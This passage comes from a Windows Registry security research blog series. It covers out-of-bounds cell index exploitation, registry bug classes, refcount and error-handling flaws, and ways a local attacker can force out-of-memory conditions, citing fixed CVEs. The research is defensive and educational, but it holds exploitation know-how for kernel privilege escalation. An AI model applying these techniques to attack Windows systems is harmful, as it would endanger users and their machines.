The above exploit shows that out-of-bounds cell indexes in the registry are a powerful exploitation technique, whose main strength lies in its determinism. Within a specific version of the operating system, a given OOB index will always result in references to the same fields of the _CMHIVE structure, which eliminates the need to use any probabilistic exploitation methods such as kernel pool spraying. Of all the available hive memory corruption exploitation methods, I consider this one to be the most stable and practical.
Therefore, it should come as no surprise that I would like Microsoft to mitigate this technique for the security of all Windows users. I already emphasized this in my previous blog post #7, but now the benefit of this mitigation is even more apparent: since the cell index bounds check is already present in HvpReleaseCellPaged, moving it to HvpGetCellPaged should be completely neutral in terms of system performance, and it would fully prevent the use of OOB indexes for any malicious purposes. I suggested this course of action in November 2023, but it hasn't been implemented by the vendor yet, so all the techniques described here still work at the time of publication.
False File Immutability
So far in this blog, we have mostly focused on a scenario where we can control the internal regf data of an active hive through memory corruption. This is certainly the most likely reason why someone would take control of registry structures, but not necessarily the only one. As I already mentioned in the previous posts, Windows uses section objects and their corresponding section views to map hive files into memory. This means that the mappings are backed by the corresponding files, and if any of them are ever evicted from memory (e.g., due to memory pressure in the system), they will be reloaded from disk the next time they are accessed. Therefore, it is crucial for system security to protect actively loaded hives from being simultaneously written to. This guarantee is achieved in the CmpOpenHiveFile function through the ShareAccess argument passed to ZwCreateFile, which takes a value of 0 or at most FILE_SHARE_READ, but never FILE_SHARE_WRITE. This causes the operating system to ensure that no application can open the file for writing as long as the handle remains open.
As I write these words, the research titled False File Immutability, published by Gabriel Landau in 2024, naturally comes to my mind. He effectively demonstrated that for files opened from remote network shares (e.g., via the SMB protocol), guarantees regarding their immutability may not be upheld in practice, as the local computer simply lacks physical control over them. However, the registry implementation is generally prepared for this eventuality: for hives loaded from locations other than the system partition, the HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL and VIEW_MAP_MUST_BE_KEPT_LOCAL flags are used, as discussed in blog post #6. These flags instruct the kernel to keep local copies of each memory page for such hives, never allowing them to be completely evicted and, as a result, having to be read again from remote storage. Thus, the attack vector seems to be correctly addressed.
However, during my audit of the registry's memory management implementation last year, I discovered two related vulnerabilities: CVE-2024-43452 and CVE-2024-49114. The second one is particularly noteworthy because, by abusing the Cloud Filter API functionality and its "placeholder files", it was possible to arbitrarily modify active hive files in the system, including those loaded from the C:\ drive. This completely bypassed the sharing access right checks and their associated security guarantees. With this type of issue, the hive corruption exploitation techniques can be used without any actual memory corruption taking place, by simply replacing the memory in question with controlled data. I believe that vulnerabilities of this class can be a real treat for bug hunters, and they are certainly worth remembering for the future.
Conclusion
Dear reader, if you've made it to the end of this blog post, and especially if you've read all the posts in this series, I'd like to sincerely congratulate you on your perseverance. 🙂 Through these write-ups, I hope I've managed to document as many implementation details of the registry as possible; details that might otherwise have never seen the light of day. My goal was to show how interesting and internally complex this mechanism is, and in particular, what an important role it plays in the security of Windows as a whole. Thank you for joining me on this adventure, and see you next time!
In the first three blog posts of this series, I sought to outline what the Windows Registry actually is, its role, history, and where to find further information about it. In the subsequent three posts, my goal was to describe in detail how this mechanism works internally – from the perspective of its clients (e.g., user-mode applications running on Windows), the regf format used to encode hives, and finally the kernel itself, which contains its canonical implementation. I believe all these elements are essential for painting a complete picture of this subsystem, and in a way, it shows my own approach to security research. One could say that going through this tedious process of getting to know the target unnecessarily lengthens the total research time, and to some extent, they would be right. On the other hand, I believe that to conduct complete research, it is equally important to answer the question of how certain things are implemented, as well as why they are implemented that way – and the latter part often requires a deeper dive into the subject. And since I have already spent the time reverse engineering and understanding various internal aspects of the registry, there are great reasons to share the information with the wider community. There is a lack of publicly available materials on how various mechanisms in the registry work, especially the most recent and most complicated ones, so I hope that the knowledge I have documented here will prove useful to others in the future.
In this blog post, we get to the heart of the matter, the actual security of the Windows Registry. I'd like to talk about what made a feature that was initially meant to be just a quick test of my fuzzing infrastructure draw me into manual research for the next 1.5 to 2 years, and result in Microsoft fixing (so far) 53 CVEs. I will describe the various areas that are important in the context of low-level security research, from very general ones, such as the characteristics of the codebase that allow security bugs to exist in the first place, to more specific ones, like all possible entry points to attack the registry, the impact of vulnerabilities and the primitives they generate, and some considerations on effective fuzzing and where more bugs might still be lurking.
Let's start with a quick recap of the registry's most fundamental properties as an attack surface:
Local attack surface for privilege escalation: As we already know, the Windows Registry is a strictly local attack surface that can potentially be leveraged by a less privileged process to gain the privileges of a higher privileged process or the kernel. It doesn't have any remote components except for the Remote Registry service, which is relatively small and not accessible from the Internet on most Windows installations.
Complex, old codebase in a memory-unsafe language: The Windows Registry is a vast and complex mechanism, entirely written in C, most of it many years ago. This means that both logic and memory safety bugs are likely to occur, and many such issues, once found, would likely remain unfixed for years or even decades.
Present in the core NT kernel: The registry implementation resides in the core Windows kernel executable (ntoskrnl.exe), which means it is not subject to mitigations like the win32k lockdown. Of course, the reachability of each registry bug needs to be considered separately in the context of specific restrictions (e.g., sandbox), as some of them require file system access or the ability to open a handle to a specific key. Nevertheless, being an integral part of the kernel significantly increases the chances that a given bug can be exploited.
Most code reachable by unprivileged users: The registry is a feature that was created for use by ordinary user-mode applications. It is therefore not surprising that the vast majority of registry-related code is reachable without any special privileges, and only a small part of the interface requires administrator rights. Privilege escalation from medium IL (Integrity Level) to the kernel is probably the most likely scenario of how a registry vulnerability could be exploited.
Manages sensitive information: In addition to the registry implementation itself being complex and potentially prone to bugs, it's important to remember that the registry inherently stores security-critical system information, including various global configurations, passwords, user permissions, and other sensitive data. This means that not only low-level bugs that directly allow code execution are a concern, but also data-only attacks and logic bugs that permit unauthorized modification or even disclosure of registry keys without proper permissions.
Not trivial to fuzz, and not very well documented: Overall, it seems that the registry is not a very friendly target for bug hunting without any knowledge of its internals. At the same time, obtaining the information is not easy either, especially for the latest registry mechanisms, which are not publicly documented and learning about them basically boils down to reverse engineering. In other words, the entry bar into this area is quite high, which can be an advantage or a disadvantage depending on the time and commitment of a potential researcher.
Security properties
The above cursory analysis seems to indicate that the registry may be a good audit target for someone interested in EoP bugs on Windows. Let's now take a closer look at some of the specific low-level reasons why the registry has proven to be a fruitful research objective.
Broad range of bug classes
Due to the registry being both complex and a central mechanism in the system operating with kernel-mode privileges, numerous classes of bugs can occur within it. An example vulnerability classification is presented below:
Hive memory corruption: Every invasive operation performed on the registry (i.e., a "write" operation) is reflected in changes made to the memory-mapped view of the hive's structure. Considering that objects within the hive include variable-length arrays, structures with counted references, and references to other cells via cell indexes (hives' equivalent of memory pointers), it's natural to expect common issues like buffer overflows or use-after-frees.
Pool memory corruption: In addition to hive memory mappings, the Configuration Manager also stores a significant amount of information on kernel pools. Firstly, there are cached copies of certain hive data, as described in my previous blog post. Secondly, there are various auxiliary objects, such as those allocated and subsequently released within a single system call. Many of these objects can fall victim to memory management bugs typical of the C language.
Information disclosure: Because the registry implementation is part of the kernel, and it exchanges large amounts of information with unprivileged user-mode applications, it must be careful not to accidentally disclose uninitialized data from the stack or kernel pools to the caller. This can happen both through output data copied to user-mode memory and through other channels, such as data leakage to a file (hive file or related log file). Therefore, it is worthwhile to keep an eye on whether all arrays and dynamically allocated buffers are fully populated or carefully filled with zeros before passing them to a lower-privileged context.
Race conditions: As a multithreaded environment, Windows allows for concurrent registry access by multiple threads. Consequently, the registry implementation must correctly synchronize access to all shared kernel-side objects and be mindful of "double fetch" bugs, which are characteristic of user-mode client interactions.
Logic bugs: In addition to being memory-safe and free of low-level bugs, a secure registry implementation must also enforce correct high-level security logic. This means preventing unauthorized users from accessing restricted keys and ensuring that the registry operates consistently with its documentation under all circumstances. This requires a deep understanding of both the explicit documentation and the implicit assumptions that underpin the registry's security from the kernel developers. Ultimately, any behavior that deviates from expected logic, whether documented or assumed, could lead to vulnerabilities.
Inter-process attacks: The registry can serve as a security target, but also as a means to exploit flaws in other applications on the system. It is a shared database, and a local attacker has many ways to indirectly interact with more privileged programs and services. A simple example is when privileged code sets overly permissive permissions on its keys, allowing unauthorized reading or modification. More complex cases can occur when there is a race condition between key creation and setting its restricted security descriptor, or when a key modification involving several properties is not performed transactionally, potentially leading to an inconsistent state. The specifics depend on how the privileged process uses the registry interface.
If I were to depict the Windows Registry in a single Venn diagram, highlighting its various possible bug classes, it might look something like this:
Manual reference counting
As I have mentioned multiple times, security descriptors in registry hives are shared by multiple keys, and therefore must be reference counted. The field responsible for this is a 32-bit unsigned integer, and any situation where it's set to a value lower than the actual number of references can result in the release of that security descriptor while it's still in use, leading to a use-after-free condition and hive-based memory corruption. So, we see that it's absolutely critical that this refcounting is implemented correctly, but unfortunately, there are (or were until recently) many reasons why this mechanism could be prone to bugs:
Usually, a reference count is a construct that exists strictly in memory, where it is initialized with a value of 1, then incremented and decremented some number of times, and finally drops to zero, causing the object to be freed. However, with registry hives, the initial refcount values are loaded from disk, from a file that we assume is controlled by the attacker. Therefore, these values cannot be trusted in any way, and the first necessary step is to actually compare and potentially adjust them according to the true number of references to each descriptor. Even though this is done in theory, bugs can creep into this logic in practice (CVE-2022-34707, CVE-2023-38139).
For a long time, all operations on reference counts were performed by directly referencing the _CM_KEY_SECURITY.ReferenceCount field, instead of using a secure wrapper. As a result, none of these incrementations were protected against integer overflow. This meant that not only a too small, but also a too large refcount value could eventually overflow and lead to a use-after-free situation (CVE-2023-28248, CVE-2024-43641). This weakness was gradually addressed in various places in the registry code between April 2023 and November 2024. Currently, all instances of refcount incrementation appear to be secure and involve calling the special helper function CmpKeySecurityIncrementReferenceCount, which protects against integer overflow. Its counterpart for refcount decrementation is CmpKeySecurityDecrementReferenceCount.
It seems that there is a lack of clarity and understanding of how certain special types of keys, such as predefined keys and tombstone keys, behave in relation to security descriptors. In theory, the only type of key that does not have a security descriptor assigned to it is the exit node (i.e., a key with the KEY_HIVE_EXIT flag set, found solely in the virtual hive rooted at \Registry\), while all other keys do have a security descriptor assigned to them, even if it is not used for anything. In practice, however, there have been several vulnerabilities in Windows that resulted either from incorrect security refresh in KCB for special types of keys (CVE-2023-21774), from releasing the security descriptor of a predefined key without considering its reference count (CVE-2023-35356), or from completely forgetting the need for reference counting the descriptors of tombstone keys in the "rename" operation (CVE-2023-35382).
When the reference count of a security descriptor reaches zero and is released, this operation is irreversible. There is no guarantee that upon reallocation, the descriptor would have the same cell index, or even that it could be reallocated at all. This is crucial for multi-step operations where individual actions could fail, necessitating a full rollback to the original state. Ideally, releasing security descriptors should always be the final step, only when the kernel can be certain that the entire operation will succeed. A vulnerability exemplifying this is CVE-2023-21772, where the registry virtualization code first released the old security descriptor and then attempted to allocate a new one. If the allocation failed, the key was left without any security properties, violating a fundamental assumption of the registry and potentially having severe consequences for system memory safety.
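The overflow-checked increment mentioned above can be sketched in isolation. The helper name CmpKeySecurityIncrementReferenceCount comes from the kernel, but its signature and internals are not public, so the function below is only a guess at the essential behavior, contrasted with the historically unchecked pattern.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Guess at the essential behavior of an overflow-safe increment such as
 * CmpKeySecurityIncrementReferenceCount; the real kernel function's
 * signature and implementation are not publicly documented. */
bool RefcountIncrementChecked(uint32_t *RefCount) {
    if (*RefCount == UINT32_MAX) {
        return false;  /* refuse to wrap the 32-bit counter to 0 */
    }
    *RefCount += 1;
    return true;
}

/* The historically unchecked pattern: at 0xFFFFFFFF the increment wraps
 * to 0, making the descriptor appear unreferenced and eligible for
 * release while live references still exist (a use-after-free setup). */
uint32_t RefcountIncrementUnchecked(uint32_t RefCount) {
    return RefCount + 1;  /* unsigned arithmetic silently wraps */
}
```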
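The safe ordering for the CVE-2023-21772 scenario (only release the old descriptor once every fallible step has succeeded) can be sketched as follows. The type and function names are hypothetical and the sketch uses plain heap allocation in place of hive cell management; it only illustrates the ordering principle, not the actual kernel code.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical, simplified stand-in for a key with an attached
 * security descriptor; heap allocations model hive cell allocations. */
typedef struct {
    void *SecurityDescriptor;
} KeyNode;

/* Allocate and populate the replacement descriptor first, and release
 * the old one only after all fallible steps have succeeded. On failure
 * the key keeps its original descriptor; the buggy pattern behind
 * CVE-2023-21772 was the reverse order (free first, allocate second),
 * which could leave the key with no descriptor at all. */
int ReplaceDescriptorSafely(KeyNode *Key, const void *NewSd, size_t Size) {
    void *Copy = malloc(Size);
    if (Copy == NULL) {
        return -1;  /* failure path: Key->SecurityDescriptor untouched */
    }
    memcpy(Copy, NewSd, Size);
    free(Key->SecurityDescriptor);  /* irreversible release happens last */
    Key->SecurityDescriptor = Copy;
    return 0;
}
```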
Aggressive self-healing and recovery
As I described in blog post #5, one of the registry's most interesting features, which distinguishes it from many other file format implementations, is that it is self-healing. The entire hive loading process, from the internal CmCheckRegistry function downwards, is focused on loading the database at all costs, even if some corrupted fragments are encountered. Only if the file damage is so extensive that recovering any data is impossible does the entire loading process fail. Of course, given that the registry stores critical system data such as its basic configuration, and the lack of access to this data virtually prevents Windows from booting, this decision made a lot of sense from the system reliability point of view. It's probably safe to assume that it has prevented the need for system reinstallation on numerous computers, simply because it did not reject hives with minor damage that might have appeared due to random hardware failure.
However, from a security perspective, this behavior is not necessarily advantageous. Firstly, it seems obvious that upon encountering an error in the input data, it is simpler to unconditionally halt its processing rather than attempt to repair it. In the latter case, it is possible for the programmer to overlook an edge case – forget to reset some field in some structure, etc. – and thus instead of fixing the file, allow for another unforeseen, inconsistent state to materialize within it. In other words, the repair logic constitutes an additional attack surface, and one that is potentially even more interesting and error-prone than other parts of the implementation. A classic example of a vulnerability associated with this property is CVE-2023-38139.
Secondly, in my view, the existence of this logic may have negatively impacted the secure development of the registry code, perhaps by leading to a discrepancy between what it guaranteed and what other developers thought it had guaranteed. For example, in 1991–1993, when the foundations of the Configuration Manager subsystem were being created in their current form, probably no one considered hive loading a potential attack vector. At that time, the registry was used only to store system configuration, and controlled hive loading was privileged and required admin rights. Therefore, I suspect that the main goal of hive checking at that time was to detect simple data inconsistencies due to hardware problems, such as single bit flips. No one expected a hive to contain a complex, specially crafted multi-kilobyte data structure designed to trigger a security flaw. Perhaps the rest of the registry code was written under the assumption that since data sanitization and self-healing occurred at load time, its state was safe from that point on and no further error handling was needed (except for out-of-memory errors). Then, in Windows Vista, a decision was made to open access to controlled hive loading by unprivileged users through the app hive mechanism, and it suddenly turned out that the existing safeguards were not entirely adequate. Attackers now became able to devise data constructs that were structurally correct at the low level, but completely beyond the scope of what the actual implementation expected and could handle.
Finally, self-healing can adversely affect system security by concealing potential registry bugs that could trigger during normal Windows operation. These problems might only become apparent after a period of time and with a "build-up" of enough issues within the hive. Because hives are mapped into memory, and the kernel operates directly on the data within the file, there exists a category of errors known as "inconsistent hive state". This refers to a data structure within the hive that doesn't fully conform to the file format specification. The occurrence of such an inconsistency is noteworthy in itself and, for someone knowledgeable about the registry, it could be a direct clue for finding vulnerabilities. However, such instances rarely cause an immediate system crash or other visible side effects. Consider security descriptors and their reference counting: as mentioned earlier, any situation where the active number of references exceeds the reference count indicates a serious security flaw. However, even if this were to happen during normal system operation, it would require all other references to that descriptor to be released and then for some other data to overwrite the freed descriptor. Then, a dangling reference would need to be used to access the descriptor. The occurrence of all these factors in sequence is quite unlikely, and the presence of self-healing further decreases these chances, as the reference count would be restored to its correct value at the next hive load. This characteristic can be likened to wrapping the entire registry code in a try/except block that catches all exceptions and masks them from the user. This is certainly helpful in the context of system reliability, but for security, it means that potential bugs are harder to spot during system run time and, for the same reason, quite difficult to fuzz. This does not mean that they don't exist; their detection just becomes more challenging.
Unclear boundaries between hard and conventional format requirements
This point is related to the previous section. In the regf format, there are certain requirements that are fairly obvious and must always be met for a file to be considered valid. Likewise, there are many elements that are permitted to be formatted arbitrarily, at the discretion of the format user. However, there is a third category, a gray area of requirements that seem reasonable and probably would be good if they were met, but it is not entirely clear whether they are formally required. Another way to describe this set of states is one that is not generated by the Windows kernel itself but is still not obviously incorrect. From a researcher's perspective, it would be worthwhile to know which parts of the format are actually required by the specification and which are only a convention adopted by the Windows code.
We might never find out, as Microsoft hasn't published an official format specification and it seems unlikely that they will in the future. The only option left for us is to rely on the implementation of the CmpCheck* functions (CmpCheckKey, CmpCheckValueList, etc.) as a sort of oracle and assume that everything there is enforced as a hard requirement, while all other states are permissible. If we go down this path, we might be in for a big surprise, as it turns out that there are many logical-sounding requirements that are not enforced in practice. This could allow user-controlled hives to contain constructs that are not obviously problematic, but are inconsistent with the spirit of the registry and its rules. In many cases, they allow encoding data in a less-than-optimal way, leading to unexpected redundancy. Some examples of such constructs are presented below:
Values with duplicate names within a single key: Under normal conditions, only one value with a given name can exist in a key, and if there is a subsequent write to the same name, the new data is assigned to the existing value. However, the uniqueness of value names is not required in input hives, and it is possible to load a hive with duplicate values.
Duplicate identical security descriptors within a single hive: Similar to the previous point, it is assumed that security descriptors within a hive are unique, and if an existing descriptor is assigned to another key, its reference count is incremented rather than allocating a new object. However, there is no guarantee that a specially crafted hive will not contain multiple duplicates of the same security descriptor, and this is accepted by the loader.
Uncompressed key names consisting solely of ASCII characters: Under normal circumstances, if a given key has a name comprising only ASCII characters, it will always be stored in a compressed form, i.e., by writing two bytes of the name in each element of the _CM_KEY_NODE.Name array of type uint16, and setting the KEY_COMP_NAME flag (0x20) in _CM_KEY_NODE.Flags. However, once again, optimal representation of names is not required when loading the hive, and this convention can be ignored without issue.
Allocated but unused cells: The Windows registry implementation deallocates objects within a hive when they are no longer needed, making space for new data. However, the loader does not require every cell marked "allocated" to be actively used. Similarly, security descriptors with a reference count of zero are typically deallocated. However, until a November 2024 refactor of the CmpCheckAndFixSecurityCellsRefcount function, it was possible to load a hive with unused security descriptors still present in the linked list. This behavior has since been changed, and unused security descriptors encountered during loading are now automatically freed and removed from the list.
These examples illustrate the issue well, but none of them (as far as I know) have particularly significant security implications. However, there were also a few specific memory corruption vulnerabilities that stemmed from the fact that the registry code made theoretically sound assumptions about the hive structure, but they were not enforced by the loader:
CVE-2022-37988: This bug is closely related to the fact that cells larger than 16 KiB are aligned to the nearest power of two in Windows, but this condition doesn't need to be satisfied during loading. This caused the shrinking of a cell to fail, even though it should always succeed in-place, "surprising" the client of the allocator and resulting in a use-after-free condition.
CVE-2022-37956: As I described in blog post #5, Windows has some logic to ensure that no leaf-type subkey list (li, lf, or lh) exceeds 511 or 1012 elements, depending on its specific type. If a list is expanded beyond this limit, it is automatically split into two lists, each half the original length. Another reasonable assumption is that the root index length would never approach the maximum value of _CM_KEY_INDEX.Count (uint16) under normal circumstances. This would require an unrealistically large number of subkeys or a very specific sequence of millions of key creations and deletions with specific names. However, it was possible to load a hive containing a subkey list of any of the four types with a length equal to 0xFFFF, and trigger a 16-bit integer overflow on the length field, leading to memory corruption. Interestingly, this is one of the few bugs that could be triggered solely with a single .bat file containing a long sequence of reg.exe command executions.
CVE-2022-38037: In this case, the kernel code assumed that the hive version defined in the header (_HBASE_BLOCK.Minor) always corresponded to the type of subkey lists used in a given hive. For example, if the file version is regf 1.3, it should be impossible for it to contain lists in a format introduced in version 1.5. However, for some reason, the hive loader doesn't enforce the proper relationship between the format version and the structures used in it, which in this case led to a serious hive-based memory corruption vulnerability.
As we can see, it is crucial to differentiate between format elements that are conventions adopted by a specific implementation, and those actually enforced during the processing of the input file. If we encounter some code that makes assumptions from the former group that don't belong to the latter one, this could indicate a serious security issue.
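The 16-bit wrap at the heart of the CVE-2022-37956 case above can be demonstrated in isolation. This is not the actual kernel code, just the arithmetic: a counter stored in a uint16 field silently wraps from 0xFFFF to 0 when incremented, while the backing data keeps growing.

```c
#include <assert.h>
#include <stdint.h>

/* Isolated model of incrementing a subkey-list element counter stored
 * in a 16-bit field (like _CM_KEY_INDEX.Count), with no overflow check.
 * At 0xFFFF the counter wraps to 0, so the list header claims zero
 * elements while the underlying data has grown past the field's range. */
uint16_t AppendToSubkeyList(uint16_t Count) {
    return (uint16_t)(Count + 1);
}
```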
Susceptibility to mishandling OOM conditions
Generally speaking, the implementation of any function in the Windows kernel is built roughly according to the following scheme:
NTSTATUS NtHighLevelOperation(...) {
    NTSTATUS Status;

    Status = HelperFunction1(...);
    if (!NT_SUCCESS(Status)) {
        //
        // Clean up...
        //
        return Status;
    }

    Status = HelperFunction2(...);
    if (!NT_SUCCESS(Status)) {
        //
        // Clean up...
        //
        return Status;
    }

    //
    // More calls...
    //

    return STATUS_SUCCESS;
}
Of course, this is a significant simplification, as real-world code contains keywords and constructs such as if statements, switch statements, various loops, and so on. The key point is that a considerable portion of higher-level functions call internal, lower-level functions specialized for specific tasks. Handling potential errors signalled by these functions is an important aspect of kernel code (or any code, for that matter). In low-level Windows code, error propagation occurs using the NTSTATUS type, which is essentially a signed 32-bit integer. A value of 0 signifies success (STATUS_SUCCESS), positive values indicate success but with additional information, and negative values denote errors. The sign of the number is checked by the NT_SUCCESS macro. During my research, I dedicated significant time to analyzing the error handling logic. Let's take a moment to think about the types of errors that could occur during registry operations, and the conditions that might cause them.
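The NTSTATUS convention described above can be reproduced in a few lines. NT_SUCCESS is publicly defined in the Windows SDK as a simple sign check, so a success code (0), an informational positive code, and an error code behave as follows:

```c
#include <assert.h>
#include <stdint.h>

/* NTSTATUS is a signed 32-bit integer; NT_SUCCESS is just a sign check,
 * matching the Windows SDK definition. Zero and positive values pass,
 * negative values (error codes, 0xC... as unsigned) fail. */
typedef int32_t NTSTATUS;
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

#define STATUS_SUCCESS                ((NTSTATUS)0x00000000L)
#define STATUS_PENDING                ((NTSTATUS)0x00000103L)  /* informational */
#define STATUS_INSUFFICIENT_RESOURCES ((NTSTATUS)0xC000009AL)  /* error */
```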
A common trait of all actions that modify data in the registry is that they allocate memory. The simplest example is the allocation of auxiliary buffers from kernel pools, requested through functions from the ExAllocatePool group. If there is very little available memory at a given point in time, one of the allocation requests may return the STATUS_INSUFFICIENT_RESOURCES error code, which will be propagated back to the original caller. And since we assume that we take on the role of a local attacker who has the ability to execute code on the machine, artificially occupying all available memory is potentially possible in many ways. So this is one way to trigger errors while performing operations on the registry, but admittedly not an ideal way, as it largely depends on the amount of RAM and the maximum pagefile size. Additionally, in a situation where the kernel has so little memory that single allocations start to fail, there is a high probability of the system crashing elsewhere before the vulnerability is successfully exploited. And finally, if several allocations are requested in nearby code in a short period of time, it seems practically impossible to take precise control over which of them will succeed and which will not.
Nonetheless, the overall concept of out-of-memory conditions is a very promising avenue for attack, especially considering that the registry primarily operates on memory-mapped hives using its own allocator, in addition to objects from kernel pools. The situation is even more favorable for an attacker due to the 2 GiB size limitation of each of the two storage types (stable and volatile) within a hive. While this is a relatively large value, it is achievable to occupy it in under a minute on today's machines. The situation is even easier if it is the volatile space that needs to be occupied, as it resides solely in memory and is not flushed to disk – so filling two gigabytes of memory is then a matter of seconds. It can be accomplished, for example, by creating many long registry values, which is a straightforward task when dealing with a controlled hive. However, even in system hives, this is often feasible. To perform data spraying on a given hive, we only need a single key granting us write permissions. For instance, both HKLM\Software and HKLM\System contain numerous keys that allow write access to any user in the system, effectively permitting them to fill the hive to capacity. Additionally, the "global registry quota" mechanism, implemented by the internal CmpClaimGlobalQuota and CmpReleaseGlobalQuota functions, ensures that the total memory occupied by registry data in the system does not exceed 4 GiB. Besides filling the entire space of a specific hive, this is thus another way to trigger out-of-memory conditions in the registry, especially when targeting a hive without write permissions. A concrete example where this mechanism could have been employed to corrupt the HKLM\SAM system hive is the CVE-2024-26181 vulnerability.
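The bookkeeping behind the global quota can be sketched as follows. This is a toy user-mode model for illustration only: the function names merely mirror the internal CmpClaimGlobalQuota/CmpReleaseGlobalQuota routines, and the real kernel implementation is more involved (and, among other things, thread-safe).

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Toy model of the 4 GiB global registry quota (illustration only). */
#define GLOBAL_REGISTRY_QUOTA (4ULL << 30) /* 4 GiB */

static uint64_t g_quota_used;

/* Returns false when the claim would exceed the global limit, which is
 * exactly the attacker-triggerable out-of-memory condition described above. */
static bool claim_global_quota(uint64_t bytes) {
    if (bytes > GLOBAL_REGISTRY_QUOTA - g_quota_used)
        return false;
    g_quota_used += bytes;
    return true;
}

static void release_global_quota(uint64_t bytes) {
    g_quota_used -= bytes;
}
```

The key property the model captures is that any hive, even one the attacker cannot write to, competes for the same 4 GiB budget, so exhausting the quota from a writable key starves allocations made on behalf of other hives.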
Considering all this, it is a fair assumption that a local attacker can cause any call to ExAllocatePool*, HvAllocateCell, and HvReallocateCell (with a length greater than the existing cell) to fail. This opens up a large number of potential error paths to analyze. The HvAllocateCell calls are a particularly interesting starting point for analysis, as there are quite a few of them and almost all of them belong to the attack surface accessible to a regular user:
There are two primary reasons why focusing on the analysis of error paths can be a good way to find security bugs. First, it stands to reason that on ordinary users' computers, it is extremely rare for a given hive to grow to 2 GiB and run out of space, or for all registry data to simultaneously occupy 4 GiB of memory. This means that these code paths are practically never executed under normal conditions, and even if there were bugs in them, there is a very small chance that they would ever be noticed by anyone. Such rarely executed code paths are always a real treat for security researchers.
The second reason is that proper error handling in code is inherently difficult. Many operations involve numerous steps that modify the hive's internal state. If an issue arises during these operations, the registry code must revert all changes and restore the registry to its original state (at least from the macro-architectural perspective). This requires the developer to be fully aware of all changes applied so far when implementing each error path. Additionally, proper error handling must be considered during the initial design of the control flow as well, because some registry actions are irreversible (e.g., freeing cells). The code must thus be structured so that all such operations are placed at the very end of the logic, where errors cannot occur anymore and successful execution is guaranteed.
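The structural rule above – all fallible steps first and reversible, irreversible steps last – can be sketched with a hypothetical, simplified user-mode example (the names do not correspond to any real kernel functions):

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>

typedef int32_t NTSTATUS;
#define NT_SUCCESS(s)                 ((s) >= 0)
#define STATUS_SUCCESS                ((NTSTATUS)0x00000000)
#define STATUS_INSUFFICIENT_RESOURCES ((NTSTATUS)0xC000009A)

/* Hypothetical operation that replaces a record's buffer. Both fallible
 * steps come first and are fully reversible; the irreversible free of the
 * old buffer is deferred until nothing can fail anymore. */
static NTSTATUS replace_buffer(char **record, size_t new_size, bool inject_error) {
    char *new_buf = malloc(new_size);           /* fallible step 1 */
    if (new_buf == NULL)
        return STATUS_INSUFFICIENT_RESOURCES;

    if (inject_error) {                         /* simulated fallible step 2 */
        free(new_buf);                          /* revert step 1 */
        return STATUS_INSUFFICIENT_RESOURCES;   /* original state intact */
    }

    /* Irreversible operation last: commit and free the old buffer. */
    free(*record);
    *record = new_buf;
    return STATUS_SUCCESS;
}
```

If the `free(*record)` were moved before the second fallible step, the error path could no longer restore the original state – which is precisely the shape of the bugs discussed next.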
One example of such a vulnerability is CVE-2023-23421, which boiled down to the following code:
NTSTATUS CmpCommitRenameKeyUoW(_CM_KCB_UOW *uow) {
  // ...
  if (!CmpAddSubKeyEx(Hive, ParentKey, NewNameKey) ||
      !CmpRemoveSubKey(Hive, ParentKey, OldNameKey)) {
    CmpFreeKeyByCell(Hive, NewNameKey);
    return STATUS_INSUFFICIENT_RESOURCES;
  }
  // ...
}
The issue here was that if the CmpRemoveSubKey call failed, the corresponding error path should have reversed the effect of the CmpAddSubKeyEx function in the previous line, but in practice it didn't. As a result, it was possible to end up with a dangling reference to a freed key in the subkey list, which was a typical use-after-free condition.
A second interesting example of this type of bug was CVE-2023-21747, where an out-of-memory error could occur during a highly sensitive operation: hive unloading. As there was no way to revert the state at the time of the OOM, Microsoft fixed the vulnerability by refactoring the CmpRemoveSubKeyFromList function and other related functions so that they no longer allocate memory from kernel pools, leaving no physical possibility of them failing.
Finally, I'll mention CVE-2023-38154, where the problem wasn't incorrect error handling, but a complete lack of it – the return value of the HvpPerformLogFileRecovery function was ignored, even though there was a real possibility it could end with an error. This is a fairly classic type of bug that can occur in any programming language, but it's definitely worth keeping in mind when auditing the Windows kernel.
Susceptibility to mishandling partial successes
The previous section discusses bugs in error handling where each function is responsible for reversing the state it has modified. However, some functions don't adhere to this operational model. Instead of operating on an "all-or-nothing" basis, they work on a best-effort basis, aiming to accomplish as much of a given task as possible. If an error occurs, they leave any changes made in place, e.g., because this result is still preferable to not making any changes. Such functions thus have three possible outcome states instead of two: complete success, partial success, and complete failure.
This might be problematic, as the approach is incompatible with the typical usage of the NTSTATUS type, which is best suited for conveying one of two (not three) states. In theory, it is a 32-bit integer type, so it could store the additional information of the status being a partial success, and not being unambiguously positive or negative. In practice, however, the convention is to directly propagate the last error encountered within the inner function, and the outer functions very rarely "dig into" specific error codes, instead assuming that if NT_SUCCESS returns FALSE, the entire operation has failed. Such confusion at the cross-function level may have security implications if the outer function should take some additional steps in the event of a partial success of the inner function, but due to the binary interpretation of the returned error code, it ultimately does not execute them.
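The hazard can be reduced to a small model. This is hypothetical code: the names are made up and only mirror the pattern, not any actual kernel implementation.

```c
#include <assert.h>
#include <stdint.h>

typedef int32_t NTSTATUS;
#define NT_SUCCESS(s)                 ((s) >= 0)
#define STATUS_SUCCESS                ((NTSTATUS)0x00000000)
#define STATUS_INSUFFICIENT_RESOURCES ((NTSTATUS)0xC000009A)

/* Best-effort inner function: performs up to two state mutations and
 * reports the last error, leaving earlier mutations in place. */
static NTSTATUS inner_best_effort(int *state, int fail_at_step) {
    *state = 1;                                 /* step 1 succeeds */
    if (fail_at_step == 2)
        return STATUS_INSUFFICIENT_RESOURCES;   /* partial success! */
    *state = 2;                                 /* step 2 succeeds */
    return STATUS_SUCCESS;
}

/* Buggy outer function: interprets any failure as "nothing happened"
 * and skips cleanup of the partially applied state. */
static NTSTATUS outer_buggy(int *state, int fail_at_step) {
    NTSTATUS st = inner_best_effort(state, fail_at_step);
    if (!NT_SUCCESS(st))
        return st;    /* BUG: *state may already have been modified */
    return STATUS_SUCCESS;
}
```

In the registry, the counterpart of the stale `*state` may be a cell index still referring to a buffer that has already been reallocated, which is how this pattern escalates from a logic slip to memory corruption.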
